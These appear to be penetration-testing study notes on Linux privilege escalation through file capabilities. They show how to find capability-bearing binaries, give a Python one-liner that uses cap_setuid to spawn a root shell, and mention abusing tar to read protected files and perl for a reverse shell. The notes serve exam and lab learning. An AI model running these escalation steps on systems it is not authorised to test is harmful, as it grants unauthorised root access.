> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/linux-privilege-escalation/capabilities.md).

# Capabilities

{% embed url="<https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/>" %}

{% embed url="<https://mn3m.info/posts/suid-vs-capabilities/>" %}

This is similar to SUID. Processes can be privileged running as 0 **or** non-privileged running as anything other than 0. Processes running as 0 can pass checks while others can't. Capabilities are more secure than SUID but can still be vulnerable

Hunting capabilities

```
getcap -r / 2>/dev/null
```

{% hint style="info" %}
**cap\_setuid+ep** means capability, set to SUID to permissions everything
{% endhint %}

All we have to do is run the binary and make it do something that will turn us into root

Python example

```bash
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

{% hint style="info" %}
Other useful tools are tar (read files) perl (reverse shell)
{% endhint %}

#### Tar example

{% hint style="info" %}
**cap\_dac\_read\_search** allows to to "*Bypass file read permission checks and directory read and execute permission checks"*
{% endhint %}

{% embed url="<https://app.gitbook.com/o/4cuxnrxcO9zV8MithZcs/s/SBzxWZ0EMDOdQIjKvSn2/warm-up/empire-breakout/priv-esc>" %}

{% embed url="<https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/?source=post_page-----0e678eb67276-------------------------------->" %}
